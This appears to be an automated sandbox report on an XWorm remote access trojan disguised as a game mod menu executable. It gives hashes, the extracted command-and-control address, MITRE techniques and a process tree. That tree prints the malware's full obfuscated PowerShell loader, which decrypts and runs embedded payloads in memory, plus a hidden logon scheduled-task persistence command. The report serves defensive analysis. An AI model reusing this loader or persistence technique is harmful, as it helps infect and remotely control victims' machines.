xworm | 6d09d43c755d5081924748104ac487afadaf68add75d85feb2a256de032a5e2c

max time kernel
142s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
14/05/2024, 11:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kiddionsmodmenu.exe
Size

386KB
MD5

88e737816cc5f3e3809152c5f9dad5be
SHA1

56dedf42285c74795f714dbac7782a5d0e695a97
SHA256

6d09d43c755d5081924748104ac487afadaf68add75d85feb2a256de032a5e2c
SHA512

8d29b5606f91b953263738f03188a56a4c981a6213b53a830bd1e3975ff3d10274704df2dda957fa0b73cd8841947d6e850c6046338b8ebe9666ca895ce0eebd
SSDEEP

12288:hFPdfNMz0ECh63X3u+DnSmMk1B+8kxkpTD:hddFMz0EH3X39DnL3PHkxgn

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

94.156.8.167:2020

Mutex

8sPZSP21r8KwS1LM

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral3/memory/2644-87-0x0000000005270000-0x000000000527E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
52	2644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2644	powershell.exe
1112	powershell.exe
4688	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	kiddionsmodmenu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1112	powershell.exe
1112	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
2644	powershell.exe
2644	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeIncreaseQuotaPrivilege	4688	powershell.exe
Token: SeSecurityPrivilege	4688	powershell.exe
Token: SeTakeOwnershipPrivilege	4688	powershell.exe
Token: SeLoadDriverPrivilege	4688	powershell.exe
Token: SeSystemProfilePrivilege	4688	powershell.exe
Token: SeSystemtimePrivilege	4688	powershell.exe
Token: SeProfSingleProcessPrivilege	4688	powershell.exe
Token: SeIncBasePriorityPrivilege	4688	powershell.exe
Token: SeCreatePagefilePrivilege	4688	powershell.exe
Token: SeBackupPrivilege	4688	powershell.exe
Token: SeRestorePrivilege	4688	powershell.exe
Token: SeShutdownPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeSystemEnvironmentPrivilege	4688	powershell.exe
Token: SeRemoteShutdownPrivilege	4688	powershell.exe
Token: SeUndockPrivilege	4688	powershell.exe
Token: SeManageVolumePrivilege	4688	powershell.exe
Token: 33	4688	powershell.exe
Token: 34	4688	powershell.exe
Token: 35	4688	powershell.exe
Token: 36	4688	powershell.exe
Token: SeIncreaseQuotaPrivilege	4688	powershell.exe
Token: SeSecurityPrivilege	4688	powershell.exe
Token: SeTakeOwnershipPrivilege	4688	powershell.exe
Token: SeLoadDriverPrivilege	4688	powershell.exe
Token: SeSystemProfilePrivilege	4688	powershell.exe
Token: SeSystemtimePrivilege	4688	powershell.exe
Token: SeProfSingleProcessPrivilege	4688	powershell.exe
Token: SeIncBasePriorityPrivilege	4688	powershell.exe
Token: SeCreatePagefilePrivilege	4688	powershell.exe
Token: SeBackupPrivilege	4688	powershell.exe
Token: SeRestorePrivilege	4688	powershell.exe
Token: SeShutdownPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeSystemEnvironmentPrivilege	4688	powershell.exe
Token: SeRemoteShutdownPrivilege	4688	powershell.exe
Token: SeUndockPrivilege	4688	powershell.exe
Token: SeManageVolumePrivilege	4688	powershell.exe
Token: 33	4688	powershell.exe
Token: 34	4688	powershell.exe
Token: 35	4688	powershell.exe
Token: 36	4688	powershell.exe
Token: SeIncreaseQuotaPrivilege	4688	powershell.exe
Token: SeSecurityPrivilege	4688	powershell.exe
Token: SeTakeOwnershipPrivilege	4688	powershell.exe
Token: SeLoadDriverPrivilege	4688	powershell.exe
Token: SeSystemProfilePrivilege	4688	powershell.exe
Token: SeSystemtimePrivilege	4688	powershell.exe
Token: SeProfSingleProcessPrivilege	4688	powershell.exe
Token: SeIncBasePriorityPrivilege	4688	powershell.exe
Token: SeCreatePagefilePrivilege	4688	powershell.exe
Token: SeBackupPrivilege	4688	powershell.exe
Token: SeRestorePrivilege	4688	powershell.exe
Token: SeShutdownPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeSystemEnvironmentPrivilege	4688	powershell.exe
Token: SeRemoteShutdownPrivilege	4688	powershell.exe
Token: SeUndockPrivilege	4688	powershell.exe
Token: SeManageVolumePrivilege	4688	powershell.exe
Token: 33	4688	powershell.exe
Token: 34	4688	powershell.exe
Token: 35	4688	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 4304	1496	kiddionsmodmenu.exe	89
PID 1496 wrote to memory of 4304	1496	kiddionsmodmenu.exe	89
PID 1496 wrote to memory of 4304	1496	kiddionsmodmenu.exe	89
PID 4304 wrote to memory of 3112	4304	cmd.exe	92
PID 4304 wrote to memory of 3112	4304	cmd.exe	92
PID 4304 wrote to memory of 3112	4304	cmd.exe	92
PID 4304 wrote to memory of 1112	4304	cmd.exe	93
PID 4304 wrote to memory of 1112	4304	cmd.exe	93
PID 4304 wrote to memory of 1112	4304	cmd.exe	93
PID 1112 wrote to memory of 4688	1112	powershell.exe	102
PID 1112 wrote to memory of 4688	1112	powershell.exe	102
PID 1112 wrote to memory of 4688	1112	powershell.exe	102
PID 1112 wrote to memory of 4044	1112	powershell.exe	106
PID 1112 wrote to memory of 4044	1112	powershell.exe	106
PID 1112 wrote to memory of 4044	1112	powershell.exe	106
PID 4044 wrote to memory of 4344	4044	WScript.exe	107
PID 4044 wrote to memory of 4344	4044	WScript.exe	107
PID 4044 wrote to memory of 4344	4044	WScript.exe	107
PID 4344 wrote to memory of 2456	4344	cmd.exe	109
PID 4344 wrote to memory of 2456	4344	cmd.exe	109
PID 4344 wrote to memory of 2456	4344	cmd.exe	109
PID 4344 wrote to memory of 2644	4344	cmd.exe	110
PID 4344 wrote to memory of 2644	4344	cmd.exe	110
PID 4344 wrote to memory of 2644	4344	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe
"C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSFD0D.tmp\XClient_Dealed.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Local\Temp\7zSFD0D.tmp\XClient_Dealed.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_378_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_378.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4688
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_378.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4044
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_378.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Roaming\Windows_Log_378.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2456
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
1⤵
PID:3272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
ef9a8a0ecf5d36236b1c13ae9d29c62b

SHA1
d6deb1f008d17c153d3cec61a7a47a415838670c

SHA256
30dd9a729b4ad719b08d5c01b36808f649f7ae0ca5a25f0c7a3a38ede50f695e

SHA512
7107afc957bbbdadc941d9b640b109314f2acea694ade1afcb4ac6acfef41d09940d38a27f3f798a7661a0f9ff1b48e1f963132de0259f8c98cf12dbcb0cb075

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
75e62548ce4d261631dc67a3c47d9e36

SHA1
7c57e23f6f3baa12faec22c628de5984d3df7726

SHA256
bb19912fb731c78bd725f458d39f7648d1f547c0e3b137682ab8a170e28ae097

SHA512
3aaf315dc3b651c800f9df0096e6bbb215fb67f686e8eeb52f0b99e7a57b1e6429696ebda41b4b43f8667dccad30beb07618948dd648bd12e9ad63c943a0973f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFD0D.tmp\XClient_Dealed.bat

Filesize
152KB

MD5
0b426e8571f8d3e437b7a42e9b8fd808

SHA1
986edba4c39be9edb552284dac555e2e95f68a4a

SHA256
9c1a4e3a1c90d013a9465ab585ad7a9cfc378ebdbe77fc1548cb81c791e6914e

SHA512
e2efb8ba96b4c11b6167f085d5545e7e4971850e3c57f76957b8a0b0e1896537d935d123de93c1ebfd3efab34139e9bf902911ba54f20ddffad21edeeb16b021

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hj5ppi3y.u50.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_378.vbs

Filesize
115B

MD5
0e9038adfadd71a35803596034804ab5

SHA1
02a5f7cfe5b2a8358aa08468703bd395eb2bc8a9

SHA256
d0e8b05374f70aa7b0e4f6db4b97f3ced994ad17aa295076e279bc03dd9c2e09

SHA512
7df5a008195cdea542c830f06cf81f4db25179c2238e019c9a365cca5b5689c9f2a9e83d8acec14ed5f80545e2541ed984e0bcd3eba4dfb77a3b0bf7f12dcfdc

Download Submit
memory/1112-32-0x0000000007140000-0x0000000007148000-memory.dmp

Filesize
32KB

Download
memory/1112-45-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-12-0x00000000057C0000-0x0000000005826000-memory.dmp

Filesize
408KB

Download
memory/1112-10-0x0000000004E30000-0x0000000004E52000-memory.dmp

Filesize
136KB

Download
memory/1112-22-0x0000000005870000-0x0000000005BC4000-memory.dmp

Filesize
3.3MB

Download
memory/1112-23-0x0000000005C70000-0x0000000005C8E000-memory.dmp

Filesize
120KB

Download
memory/1112-24-0x0000000005D60000-0x0000000005DAC000-memory.dmp

Filesize
304KB

Download
memory/1112-25-0x0000000006E80000-0x0000000006EC4000-memory.dmp

Filesize
272KB

Download
memory/1112-26-0x00000000736FE000-0x00000000736FF000-memory.dmp

Filesize
4KB

Download
memory/1112-27-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-28-0x0000000006F80000-0x0000000006FF6000-memory.dmp

Filesize
472KB

Download
memory/1112-29-0x0000000007680000-0x0000000007CFA000-memory.dmp

Filesize
6.5MB

Download
memory/1112-30-0x0000000007020000-0x000000000703A000-memory.dmp

Filesize
104KB

Download
memory/1112-31-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-9-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/1112-33-0x0000000007160000-0x000000000717E000-memory.dmp

Filesize
120KB

Download
memory/1112-34-0x00000000082B0000-0x0000000008854000-memory.dmp

Filesize
5.6MB

Download
memory/1112-11-0x0000000005750000-0x00000000057B6000-memory.dmp

Filesize
408KB

Download
memory/1112-5-0x00000000736FE000-0x00000000736FF000-memory.dmp

Filesize
4KB

Download
memory/1112-6-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-73-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-7-0x0000000004790000-0x00000000047C6000-memory.dmp

Filesize
216KB

Download
memory/1112-70-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-8-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/2644-83-0x0000000005F50000-0x00000000062A4000-memory.dmp

Filesize
3.3MB

Download
memory/2644-85-0x0000000006A50000-0x0000000006A9C000-memory.dmp

Filesize
304KB

Download
memory/2644-87-0x0000000005270000-0x000000000527E000-memory.dmp

Filesize
56KB

Download
memory/2644-88-0x0000000007B10000-0x0000000007BAC000-memory.dmp

Filesize
624KB

Download
memory/2644-90-0x00000000085E0000-0x0000000008672000-memory.dmp

Filesize
584KB

Download
memory/4688-62-0x00000000079E0000-0x00000000079F1000-memory.dmp

Filesize
68KB

Download
memory/4688-61-0x0000000007A40000-0x0000000007AD6000-memory.dmp

Filesize
600KB

Download
memory/4688-60-0x0000000007840000-0x000000000784A000-memory.dmp

Filesize
40KB

Download
memory/4688-59-0x0000000007640000-0x00000000076E3000-memory.dmp

Filesize
652KB

Download
memory/4688-58-0x00000000069C0000-0x00000000069DE000-memory.dmp

Filesize
120KB

Download
memory/4688-48-0x000000006FF80000-0x000000006FFCC000-memory.dmp

Filesize
304KB

Download
memory/4688-47-0x0000000006A00000-0x0000000006A32000-memory.dmp

Filesize
200KB

Download